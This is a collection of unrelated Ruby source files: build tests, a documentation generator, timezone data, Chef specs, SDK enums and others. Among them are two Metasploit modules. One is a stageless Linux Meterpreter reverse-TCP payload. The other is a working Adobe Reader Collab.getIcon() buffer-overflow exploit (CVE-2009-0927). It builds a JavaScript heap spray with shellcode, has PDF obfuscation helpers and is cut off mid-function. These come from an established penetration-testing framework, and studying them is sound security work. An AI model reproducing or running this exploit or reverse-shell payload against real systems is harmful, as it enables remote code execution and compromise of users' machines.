datadir = File.join(tdir, "data")
plugdir = File.join(tdir, "plugins")
[logdir, datadir, plugdir].each do |d|
Dir.mkdir(d)
end
Dir.chdir(pkgshare)
res = PTY.spawn(bin/"grafana-server",
"cfg:default.paths.logs=#{logdir}",
"cfg:default.paths.data=#{datadir}",
"cfg:default.paths.plugins=#{plugdir}",
"cfg:default.server.http_port=50100")
r = res[0]
w = res[1]
pid = res[2]
listening = Timeout.timeout(5) do
li = false
r.each do |l|
if l =~ /Initializing HTTPServer/
li = true
break
end
end
li
end
Process.kill("TERM", pid)
w.close
r.close
listening
end
end

#! /usr/bin/env ruby
$LOAD_PATH << "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team" unless $LOAD_PATH.include? "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team"

require 'erb'
require 'fileutils'
require 'atomic_red_team'

class AtomicRedTeamDocs
  ATTACK_API = Attack.new
  ATOMIC_RED_TEAM = AtomicRedTeam.new
  ATOMIC_RED_TEAM_DIR = "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team"

  #
  # Generates all the documentation used by Atomic Red Team
  #
  def generate_all_the_docs!
    oks = []
    fails = []

    ATOMIC_RED_TEAM.atomic_tests.each do |atomic_yaml|
      begin
        print "Generating docs for #{atomic_yaml['atomic_yaml_path']}"
        generate_technique_docs! atomic_yaml, atomic_yaml['atomic_yaml_path'].gsub(/.yaml/, '.md')
        # generate_technique_execution_docs! atomic_yaml, "#{File.dirname(File.dirname(__FILE__))}/atomic-red-team-execution/#{atomic_yaml['attack_technique'].downcase}.html"
        oks << atomic_yaml['atomic_yaml_path']
        puts "OK"
      rescue => ex
        fails << atomic_yaml['atomic_yaml_path']
        puts "FAIL\n#{ex}\n#{ex.backtrace.join("\n")}"
      end
    end

    puts
    puts "Generated docs for #{oks.count} techniques, #{fails.count} failures"

    generate_attack_matrix! 'All', "#{File.dirname(File.dirname(__FILE__))}/atomics/matrix.md"
    generate_attack_matrix! 'Windows', "#{File.dirname(File.dirname(__FILE__))}/atomics/windows-matrix.md", only_platform: /windows/
    generate_attack_matrix! 'macOS', "#{File.dirname(File.dirname(__FILE__))}/atomics/macos-matrix.md", only_platform: /macos/
    generate_attack_matrix! 'Linux', "#{File.dirname(File.dirname(__FILE__))}/atomics/linux-matrix.md", only_platform: /^(?!windows|macos).*$/

    generate_index! 'All', "#{File.dirname(File.dirname(__FILE__))}/atomics/index.md"
    generate_index! 'Windows', "#{File.dirname(File.dirname(__FILE__))}/atomics/windows-index.md", only_platform: /windows/
    generate_index! 'macOS', "#{File.dirname(File.dirname(__FILE__))}/atomics/macos-index.md", only_platform: /macos/
    generate_index! 'Linux', "#{File.dirname(File.dirname(__FILE__))}/atomics/linux-index.md", only_platform: /^(?!windows|macos).*$/

    generate_yaml_index! "#{File.dirname(File.dirname(__FILE__))}/atomics/index.yaml"

    return oks, fails
  end

  #
  # Generates Markdown documentation for a specific technique from its YAML source
  #
  def generate_technique_docs!(atomic_yaml, output_doc_path)
    technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique'))
    technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase

    template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_doc_template.md.erb"), nil, "-"
    generated_doc = template.result(binding)

    print " => #{output_doc_path} => "
    File.write output_doc_path, generated_doc
  end

  #
  # Generates Markdown documentation for a specific technique from its YAML source
  #
  def generate_technique_execution_docs!(atomic_yaml, output_doc_path)
    FileUtils.mkdir_p File.dirname(output_doc_path)

    technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique'))
    technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase

    template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_execution_template.html.erb"), nil, "-"
    generated_doc = template.result(binding)

    print " => #{output_doc_path} => "
    File.write output_doc_path, generated_doc
  end

  #
  # Generates a Markdown ATT&CK documentation matrix for all techniques
  #
  def generate_attack_matrix!(title_prefix, output_doc_path, only_platform: /.*/)
    result = ''
    result += "# #{title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
    result += "| #{ATTACK_API.ordered_tactics.join(' | ')} |\n"
    result += "|#{'-----|' * ATTACK_API.ordered_tactics.count}\n"

    ATTACK_API.ordered_tactic_to_technique_matrix(only_platform: only_platform).each do |row_of_techniques|
      row_values = row_of_techniques.collect do |technique|
        if technique
          ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: false)
        end
      end
      result += "| #{row_values.join(' | ')} |\n"
    end

    File.write output_doc_path, result
    puts "Generated ATT&CK matrix at #{output_doc_path}"
  end

  #
  # Generates a master Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests
  #
  def generate_index!(title_prefix, output_doc_path, only_platform: /.*/)
    result = ''
    result += "# #{title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"

    ATTACK_API.techniques_by_tactic(only_platform: only_platform).each do |tactic, techniques|
      result += "# #{tactic}\n"

      techniques.each do |technique|
        result += "- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: true, link_new_to_contrib: true)}\n"

        ATOMIC_RED_TEAM.atomic_tests_for_technique(technique).each_with_index do |atomic_test, i|
          next unless atomic_test['supported_platforms'].any? {|platform| platform.downcase =~ only_platform}

          result += " - Atomic Test ##{i+1}: #{atomic_test['name']} [#{atomic_test['supported_platforms'].join(', ')}]\n"
        end
      end
      result += "\n"
    end

    File.write output_doc_path, result
    puts "Generated Atomic Red Team index at #{output_doc_path}"
  end

  #
  # Generates a master YAML index of ATT&CK Tactic -> Technique -> Atomic Tests
  #
  def generate_yaml_index!(output_doc_path)
    result = {}

    ATTACK_API.techniques_by_tactic.each do |tactic, techniques|
      result[tactic] = techniques.collect do |technique|
        [
          technique['identifier'],
          {
            'technique' => technique,
            'atomic_tests' => ATOMIC_RED_TEAM.atomic_tests_for_technique(technique)
          }
        ]
      end.to_h
    end

    File.write output_doc_path, JSON.parse(result.to_json).to_yaml # shenanigans to eliminate YAML aliases
    puts "Generated Atomic Red Team YAML index at #{output_doc_path}"
  end
end

#
# MAIN
#
oks, fails = AtomicRedTeamDocs.new.generate_all_the_docs!
exit fails.count

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_armbe_linux'

module MetasploitModule
  CachedSize = 902836

  include Msf::Payload::Single
  include Msf::Sessions::MeterpreterOptions
  include Msf::Sessions::MettleConfig

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Meterpreter, Reverse TCP Inline',
        'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
        'Author' => [
          'Adam Cammack <adam_cammack[at]rapid7.com>',
          'Brent Cook <brent_cook[at]rapid7.com>',
          'timwr'
        ],
        'Platform' => 'linux',
        'Arch' => ARCH_ARMBE,
        'License' => MSF_LICENSE,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::Meterpreter_armbe_Linux
      )
    )
  end

  def generate
    opts = {
      scheme: 'tcp',
      stageless: true
    }
    MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec
  end
end

cask "linear-linear" do
version "1.5.1"
sha256 :no_check
if Hardware::CPU.intel?
url "https://desktop.linear.app/mac/dmg/x64"
livecheck do
url "https://desktop.linear.app/mac/dmg/x64"
strategy :header_match
regex(/Linear\s*(\d+(?:\.\d+)*?)[._-]x64.dmg/)
end
else
url "https://desktop.linear.app/mac/dmg/arm64"
livecheck do
url "https://desktop.linear.app/mac/dmg/arm64"
strategy :header_match
regex(/Linear\s*(\d+(?:\.\d+)*?)[._-]arm64.dmg/)
end
end
name "Linear"
desc "App to manage software development and track bugs"
homepage "https://linear.app/"
auto_updates true
app "Linear.app"
zap trash: [
"~/Library/Application Support/Linear",
"~/Library/Caches/com.linear",
"~/Library/Caches/com.linear.ShipIt",
"~/Library/Preferences/com.linear.plist",
"~/Library/Saved Application State/com.linear.savedState",
]
end

# encoding: UTF-8
module TZInfo
  module Definitions
    module Europe
      module Rome
        include TimezoneDefinition

        timezone 'Europe/Rome' do |tz|
          tz.offset :o0, 2996, 0, :LMT
          tz.offset :o1, 2996, 0, :RMT
          tz.offset :o2, 3600, 0, :CET
          tz.offset :o3, 3600, 3600, :CEST

          tz.transition 1866, 9, :o1, 51901915651, 21600
          tz.transition 1893, 10, :o2, 57906443, 24
          tz.transition 1916, 6, :o3, 58104443, 24
          tz.transition 1916, 9, :o2, 29053649, 12
          tz.transition 1917, 3, :o3, 58111667, 24
          tz.transition 1917, 9, :o2, 29058029, 12
          tz.transition 1918, 3, :o3, 58119899, 24
          tz.transition 1918, 10, :o2, 29062481, 12
          tz.transition 1919, 3, :o3, 58128467, 24
          tz.transition 1919, 10, :o2, 29066837, 12
          tz.transition 1920, 3, :o3, 58137707, 24
          tz.transition 1920, 9, :o2, 29071037, 12
          tz.transition 1940, 6, :o3, 58315091, 24
          tz.transition 1942, 11, :o2, 58335973, 24
          tz.transition 1943, 3, :o3, 58339501, 24
          tz.transition 1943, 10, :o2, 58344037, 24
          tz.transition 1944, 4, :o3, 58348405, 24
          tz.transition 1944, 9, :o2, 58352413, 24
          tz.transition 1945, 4, :o3, 58357141, 24
          tz.transition 1945, 9, :o2, 58361123, 24
          tz.transition 1946, 3, :o3, 58365517, 24
          tz.transition 1946, 10, :o2, 58370389, 24
          tz.transition 1947, 3, :o3, 58374251, 24
          tz.transition 1947, 10, :o2, 58379123, 24
          tz.transition 1948, 2, :o3, 58382653, 24
          tz.transition 1948, 10, :o2, 58387861, 24
          tz.transition 1966, 5, :o3, 58542419, 24
          tz.transition 1966, 9, :o2, 29272721, 12
          tz.transition 1967, 5, :o3, 58551323, 24
          tz.transition 1967, 9, :o2, 58554179, 24
          tz.transition 1968, 5, :o3, 58560059, 24
          tz.transition 1968, 9, :o2, 58562915, 24
          tz.transition 1969, 5, :o3, 58568963, 24
          tz.transition 1969, 9, :o2, 58571819, 24
          tz.transition 1970, 5, :o3, 12956400
          tz.transition 1970, 9, :o2, 23238000
          tz.transition 1971, 5, :o3, 43801200
          tz.transition 1971, 9, :o2, 54687600
          tz.transition 1972, 5, :o3, 75855600
          tz.transition 1972, 9, :o2, 86742000
          tz.transition 1973, 6, :o3, 107910000
          tz.transition 1973, 9, :o2, 118191600
          tz.transition 1974, 5, :o3, 138754800
          tz.transition 1974, 9, :o2, 149641200
          tz.transition 1975, 5, :o3, 170809200
          tz.transition 1975, 9, :o2, 181090800
          tz.transition 1976, 5, :o3, 202258800
          tz.transition 1976, 9, :o2, 212540400
          tz.transition 1977, 5, :o3, 233103600
          tz.transition 1977, 9, :o2, 243990000
          tz.transition 1978, 5, :o3, 265158000
          tz.transition 1978, 9, :o2, 276044400
          tz.transition 1979, 5, :o3, 296607600
          tz.transition 1979, 9, :o2, 307494000
          tz.transition 1980, 4, :o3, 323830800
          tz.transition 1980, 9, :o2, 338950800
          tz.transition 1981, 3, :o3, 354675600
          tz.transition 1981, 9, :o2, 370400400
          tz.transition 1982, 3, :o3, 386125200
          tz.transition 1982, 9, :o2, 401850000
          tz.transition 1983, 3, :o3, 417574800
          tz.transition 1983, 9, :o2, 433299600
          tz.transition 1984, 3, :o3, 449024400
          tz.transition 1984, 9, :o2, 465354000
          tz.transition 1985, 3, :o3, 481078800
          tz.transition 1985, 9, :o2, 496803600
          tz.transition 1986, 3, :o3, 512528400
          tz.transition 1986, 9, :o2, 528253200
          tz.transition 1987, 3, :o3, 543978000
          tz.transition 1987, 9, :o2, 559702800
          tz.transition 1988, 3, :o3, 575427600
          tz.transition 1988, 9, :o2, 591152400
          tz.transition 1989, 3, :o3, 606877200
          tz.transition 1989, 9, :o2, 622602000
          tz.transition 1990, 3, :o3, 638326800
          tz.transition 1990, 9, :o2, 654656400
          tz.transition 1991, 3, :o3, 670381200
          tz.transition 1991, 9, :o2, 686106000
          tz.transition 1992, 3, :o3, 701830800
          tz.transition 1992, 9, :o2, 717555600
          tz.transition 1993, 3, :o3, 733280400
          tz.transition 1993, 9, :o2, 749005200
          tz.transition 1994, 3, :o3, 764730000
          tz.transition 1994, 9, :o2, 780454800
          tz.transition 1995, 3, :o3, 796179600
          tz.transition 1995, 9, :o2, 811904400
          tz.transition 1996, 3, :o3, 828234000
          tz.transition 1996, 10, :o2, 846378000
          tz.transition 1997, 3, :o3, 859683600
          tz.transition 1997, 10, :o2, 877827600
          tz.transition 1998, 3, :o3, 891133200
          tz.transition 1998, 10, :o2, 909277200
          tz.transition 1999, 3, :o3, 922582800
          tz.transition 1999, 10, :o2, 941331600
          tz.transition 2000, 3, :o3, 954032400
          tz.transition 2000, 10, :o2, 972781200
          tz.transition 2001, 3, :o3, 985482000
          tz.transition 2001, 10, :o2, 1004230800
          tz.transition 2002, 3, :o3, 1017536400
          tz.transition 2002, 10, :o2, 1035680400
          tz.transition 2003, 3, :o3, 1048986000
          tz.transition 2003, 10, :o2, 1067130000
          tz.transition 2004, 3, :o3, 1080435600
          tz.transition 2004, 10, :o2, 1099184400
          tz.transition 2005, 3, :o3, 1111885200
          tz.transition 2005, 10, :o2, 1130634000
          tz.transition 2006, 3, :o3, 1143334800
          tz.transition 2006, 10, :o2, 1162083600
          tz.transition 2007, 3, :o3, 1174784400
          tz.transition 2007, 10, :o2, 1193533200
          tz.transition 2008, 3, :o3, 1206838800
          tz.transition 2008, 10, :o2, 1224982800
          tz.transition 2009, 3, :o3, 1238288400
          tz.transition 2009, 10, :o2, 1256432400
          tz.transition 2010, 3, :o3, 1269738000
          tz.transition 2010, 10, :o2, 1288486800
          tz.transition 2011, 3, :o3, 1301187600
          tz.transition 2011, 10, :o2, 1319936400
          tz.transition 2012, 3, :o3, 1332637200
          tz.transition 2012, 10, :o2, 1351386000
          tz.transition 2013, 3, :o3, 1364691600
          tz.transition 2013, 10, :o2, 1382835600
          tz.transition 2014, 3, :o3, 1396141200
          tz.transition 2014, 10, :o2, 1414285200
          tz.transition 2015, 3, :o3, 1427590800
          tz.transition 2015, 10, :o2, 1445734800
          tz.transition 2016, 3, :o3, 1459040400
          tz.transition 2016, 10, :o2, 1477789200
          tz.transition 2017, 3, :o3, 1490490000
          tz.transition 2017, 10, :o2, 1509238800
          tz.transition 2018, 3, :o3, 1521939600
          tz.transition 2018, 10, :o2, 1540688400
          tz.transition 2019, 3, :o3, 1553994000
          tz.transition 2019, 10, :o2, 1572138000
          tz.transition 2020, 3, :o3, 1585443600
          tz.transition 2020, 10, :o2, 1603587600
          tz.transition 2021, 3, :o3, 1616893200
          tz.transition 2021, 10, :o2, 1635642000
          tz.transition 2022, 3, :o3, 1648342800
          tz.transition 2022, 10, :o2, 1667091600
          tz.transition 2023, 3, :o3, 1679792400
          tz.transition 2023, 10, :o2, 1698541200
          tz.transition 2024, 3, :o3, 1711846800
          tz.transition 2024, 10, :o2, 1729990800
          tz.transition 2025, 3, :o3, 1743296400
          tz.transition 2025, 10, :o2, 1761440400
          tz.transition 2026, 3, :o3, 1774746000
          tz.transition 2026, 10, :o2, 1792890000
          tz.transition 2027, 3, :o3, 1806195600
          tz.transition 2027, 10, :o2, 1824944400
          tz.transition 2028, 3, :o3, 1837645200
          tz.transition 2028, 10, :o2, 1856394000
          tz.transition 2029, 3, :o3, 1869094800
          tz.transition 2029, 10, :o2, 1887843600
          tz.transition 2030, 3, :o3, 1901149200
          tz.transition 2030, 10, :o2, 1919293200
          tz.transition 2031, 3, :o3, 1932598800
          tz.transition 2031, 10, :o2, 1950742800
          tz.transition 2032, 3, :o3, 1964048400
          tz.transition 2032, 10, :o2, 1982797200
          tz.transition 2033, 3, :o3, 1995498000
          tz.transition 2033, 10, :o2, 2014246800
          tz.transition 2034, 3, :o3, 2026947600
          tz.transition 2034, 10, :o2, 2045696400
          tz.transition 2035, 3, :o3, 2058397200
          tz.transition 2035, 10, :o2, 2077146000
          tz.transition 2036, 3, :o3, 2090451600
          tz.transition 2036, 10, :o2, 2108595600
          tz.transition 2037, 3, :o3, 2121901200
          tz.transition 2037, 10, :o2, 2140045200
          tz.transition 2038, 3, :o3, 59172253, 24
          tz.transition 2038, 10, :o2, 59177461, 24
          tz.transition 2039, 3, :o3, 59180989, 24
          tz.transition 2039, 10, :o2, 59186197, 24
          tz.transition 2040, 3, :o3, 59189725, 24
          tz.transition 2040, 10, :o2, 59194933, 24
          tz.transition 2041, 3, :o3, 59198629, 24
          tz.transition 2041, 10, :o2, 59203669, 24
          tz.transition 2042, 3, :o3, 59207365, 24
          tz.transition 2042, 10, :o2, 59212405, 24
          tz.transition 2043, 3, :o3, 59216101, 24
          tz.transition 2043, 10, :o2, 59221141, 24
          tz.transition 2044, 3, :o3, 59224837, 24
          tz.transition 2044, 10, :o2, 59230045, 24
          tz.transition 2045, 3, :o3, 59233573, 24
          tz.transition 2045, 10, :o2, 59238781, 24
          tz.transition 2046, 3, :o3, 59242309, 24
          tz.transition 2046, 10, :o2, 59247517, 24
          tz.transition 2047, 3, :o3, 59251213, 24
          tz.transition 2047, 10, :o2, 59256253, 24
          tz.transition 2048, 3, :o3, 59259949, 24
          tz.transition 2048, 10, :o2, 59264989, 24
          tz.transition 2049, 3, :o3, 59268685, 24
          tz.transition 2049, 10, :o2, 59273893, 24
          tz.transition 2050, 3, :o3, 59277421, 24
          tz.transition 2050, 10, :o2, 59282629, 24
        end
      end
    end
  end
end
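
# Lookup sketch (added for illustration; not part of the generated data
# file). With the tzinfo gem, the definition above is resolved through the
# usual API:
#
#   tz = TZInfo::Timezone.get('Europe/Rome')
#   tz.period_for_utc(Time.utc(2020, 7, 1)).utc_total_offset # => 7200 (CEST)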

require 'spec_helper'
require 'f5/icontrol'
require_relative '../../../libraries/vip'
require_relative '../../../libraries/credentials'
require_relative '../../../libraries/gem_helper'

describe 'f5_test::test_create_vip_none_http_profile' do
  let(:api) { double('F5::Icontrol') }
  let(:server_api) { double('F5::Icontrol::LocalLB::VirtualServer') }

  let(:chef_run) do
    ChefSpec::SoloRunner.new(
      platform: 'centos',
      version: '7.2.1511',
      step_into: ['f5_vip']
    ) do |node|
      node.normal[:f5][:credentials][:default] = {
        host: '1.2.3.4',
        username: 'api',
        password: 'testing'
      }
    end.converge(described_recipe)
  end

  before do
    allow(F5::Icontrol::API).to receive(:new) { api }
    allow(api)
      .to receive_message_chain('LocalLB.VirtualServer') { server_api }
    allow_any_instance_of(Chef::RunContext::CookbookCompiler)
      .to receive(:compile_libraries).and_return(true)
    stub_data_bag_item('f5', 'default')
      .and_return(host: '1.2.3.4', username: 'api', password: 'testing')
    allow(server_api).to receive(:get_rule).and_return({item: {}})

    allow(server_api).to receive(:get_destination_v2) {
      { item: { address: '86.75.30.9', port: '80' } }
    }
  end

  context 'when managing the vip' do
    before do
      allow(server_api).to receive(:get_profile) {
        { item: { item: {profile_type: 'PROFILE_TYPE_HTTP', profile_context: 'PROFILE_CONTEXT_TYPE_ALL', profile_name: '/Common/http'} }}
      }

      # these vips have their SAT set to None
      allow(server_api)
        .to receive(:get_source_address_translation_type) {
          { item: [
            F5::Icontrol::LocalLB::VirtualServer::SourceAddressTranslationType::SRC_TRANS_NONE
          ]}}
    end

    context 'and the vip has an http profile' do
      before do
        allow(server_api).to receive(:get_list) {
          { item: ['/Common/myvip'] }
        }
      end

      it 'deletes the http profile' do
        allow_any_instance_of(ChefF5::VIP).to receive(:vip_default_pool)
        allow_any_instance_of(ChefF5::VIP).to receive(:set_vip_pool)
        expect(server_api).to receive(:remove_profile).with(hash_including(profiles: {item: [{item: [hash_including(profile_name: '/Common/http')]}]}))
        chef_run
      end
    end

    context 'and the vip does not have an http profile' do
      before do
        allow(server_api).to receive(:get_list) {
          { item: ['/Common/myvip'] }
        }

        allow(server_api).to receive(:get_profile) {
          { item: { item: {} } }
        }

        allow_any_instance_of(ChefF5::VIP).to receive(:vip_default_pool)
        allow_any_instance_of(ChefF5::VIP).to receive(:set_vip_pool)
      end

      it 'does not attempt to delete any http profile' do
        expect(server_api).not_to receive(:remove_profile)
        chef_run
      end
    end
  end
end

require 'spec_helper'
describe RubyLint::VirtualMachine do
  describe 'scoping method definitions' do
    example 'process a global method' do
      defs = build_definitions('def example; end')
      example = defs.lookup(:instance_method, 'example')

      example.is_a?(ruby_method).should == true

      example.type.should == :instance_method
      example.name.should == 'example'
    end

    example 'process a nested method' do
      code = <<-CODE
def first
  def second
  end
end
      CODE

      defs = build_definitions(code)
      first = defs.lookup(:instance_method, 'first')

      first.is_a?(ruby_method).should == true

      first.lookup(:instance_method, 'second') \
        .is_a?(ruby_method) \
        .should == true

      defs.lookup(:instance_method, 'second').nil?.should == true
    end

    example 'process a global and nested method' do
      code = <<-CODE
def first
  def second
  end
end

def third
end
      CODE

      defs = build_definitions(code)
      first = defs.lookup(:instance_method, 'first')

      first.lookup(:instance_method, 'second') \
        .is_a?(ruby_method) \
        .should == true

      first.lookup(:instance_method, 'second') \
        .lookup(:instance_method, 'third') \
        .is_a?(ruby_method) \
        .should == true

      defs.lookup(:instance_method, 'third') \
        .is_a?(ruby_method) \
        .should == true
    end
  end
end

class Issue < ReportPart
  belongs_to :reportable, polymorphic: true
  belongs_to :issue_template, required: false

  def self.create_from_template(issue_group, issue_template)
    Issue.create(
      reportable: issue_group,
      title: issue_template.title,
      description: issue_template.description,
      rating: issue_template.rating,
      recommendation: issue_template.recommendation,
      severity: issue_template.severity,
      issue_template: issue_template
    )
  end

  def color
    case severity
    when 0
      'green'
    when 1
      'blue'
    when 2
      'orange'
    when 3
      'red'
    when 4
      'purple'
    else
      'grey'
    end
  end

  def color_hex
    case severity
    when 0
      '#3fb079;'
    when 1
      '#0b5394;'
    when 2
      '#b45f06;'
    when 3
      '#990000;'
    when 4
      '#9900ff;'
    else
      '#999999;'
    end
  end

  def colorize(text)
    result = text.gsub '<color>', "<strong><span style='color: #{color_hex}'>"
    result = result.gsub '</color>', "</span></strong>"
    result.lstrip.rstrip.lines.join('<br>') # trim whitespace at both ends and join the lines with HTML line breaks
  end

  def clean_text(text)
=begin
    result = text.gsub '<color>', ""
    result.gsub '</color>', ""
    result = text.gsub '<i>', ""
    result.gsub '</i>', ""
=end
    ActionView::Base.full_sanitizer.sanitize(text.to_s)
  end
end
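
# Behaviour sketch derived from the methods above (added for illustration;
# the issue text is made up). For an issue with severity 3:
#
#   issue.color # => "red"
#   issue.colorize('<color>SQLi</color> in login')
#   # => "<strong><span style='color: #990000;'>SQLi</span></strong> in login"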

# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

module Azure::Network::Mgmt::V2018_10_01
  module Models
    #
    # Defines values for VirtualNetworkGatewayConnectionType
    #
    module VirtualNetworkGatewayConnectionType
      IPsec = "IPsec"
      Vnet2Vnet = "Vnet2Vnet"
      ExpressRoute = "ExpressRoute"
      VPNClient = "VPNClient"
    end
  end
end

#
# Author:: Joshua Timberman <[email protected]>
# Copyright:: Copyright (c) 2012, Joshua Timberman
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
default['iterm2']['version'] = "-1_0_0_20120123"
default['iterm2']['checksum'] = "1c9ce81fc60c329dee0755d9b5dc7888ea96d1642d244ede2ce6bca3cabd6920"
# Support for iTerm2's tmux integration
default['iterm2']['tmux_enabled'] = false
default['iterm2']['tmux_compile'] = false
default['iterm2']['tmux_version'] = "20120108"
default['iterm2']['tmux_checksum'] = "b97b9426959f18c60225c56ec1400fe48b500c422cef15e154b7ea61c2191cc0"
default['iterm2']['tmux_compiled_checksum'] = "d238e2b03bcfa9c6c6b6d294344eea9ec0dd938f2c915165391a2c3f6909d352"
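
# Override sketch (added for illustration; not from this cookbook).
# Attribute defaults like these are typically overridden from a recipe,
# role, or wrapper cookbook, e.g.:
#
#   node.override['iterm2']['tmux_enabled'] = true
#   node.override['iterm2']['tmux_compile'] = true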

# -*- coding: UTF-8 -*-
require 'haml/util'
require 'haml/engine'

module Zorglub
  module Engines
    module Haml
      def self.proc path,obj
        if obj.app.opt(:engines_cache_enabled)
          key = path.sub obj.app.opt(:root),''
          haml = obj.app.engines_cache[key] ||= ::Haml::Engine.new( ::File.open(path,'r'){|f| f.read }, obj.app.opt(:haml_options) )
        else
          haml = ::Haml::Engine.new( ::File.open(path,'r'){|f| f.read }, obj.app.opt(:haml_options) )
        end
        html = haml.render(obj)
        return html, 'text/html'
      end
    end
  end
end
# EOF

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Collab.getIcon() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.
Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially
        crafted PDF that contains a malformed Collab.getIcon() call, an attacker may
be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'MC',
'Didier Stevens <didier.stevens[at]gmail.com>',
'jduck'
],
'References' =>
[
[ 'CVE', '2009-0927' ],
[ 'OSVDB', '53647' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-04.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 7.0.5 - no trigger
# reader 7.0.8 - no trigger
# reader 7.0.9 - no trigger
# reader 7.1.0 - no trigger
# reader 7.1.1 - reported not vulnerable
# reader 8.0.0 - works
# reader 8.1.2 - works
# reader 8.1.3 - reported not vulnerable
# reader 9.0.0 - works
# reader 9.1.0 - reported not vulnerable
[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],
],
'DisclosureDate' => 'Mar 24 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape(make_nops(4))
# Randomize variables
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
rand12 = rand_text_alpha(rand(100) + 1)
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} ="";
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
#{rand4} = #{rand2} + #{rand1};
#{rand5} = unescape("#{nops}");
#{rand6} = 20;
#{rand7} = #{rand6}+#{rand4}.length
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
#{rand8} = #{rand5}.substring(0, #{rand7});
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
#{rand10} = new Array();
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
var #{rand12} = unescape("%0a");
while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
#{rand12} = "N."+#{rand12};
Collab.getIcon(#{rand12});
|
# Create the pdf
pdf = make_pdf(script)
print_status("Sending #{self.name}")
send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })
handler(cli)
end
def RandomNonASCIIString(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def ioDef(id)
"%d 0 obj" % id
end
def ioRef(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def nObfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
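  # Illustrative (randomized) example — output is non-deterministic, one
  # possible result shown:
  #   nObfu("Type")  # => "#54ype"  (letters may be replaced by #<hex> escapes)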
def ASCIIHexWhitespaceEncode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
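  # Illustrative example — whitespace widths are random (1-3 spaces):
  #   ASCIIHexWhitespaceEncode("AB")  # => "41  42>"  (hex bytes, then the ">" end-of-data marker)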
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << RandomNonASCIIString(4) << eol
xref << pdf.length
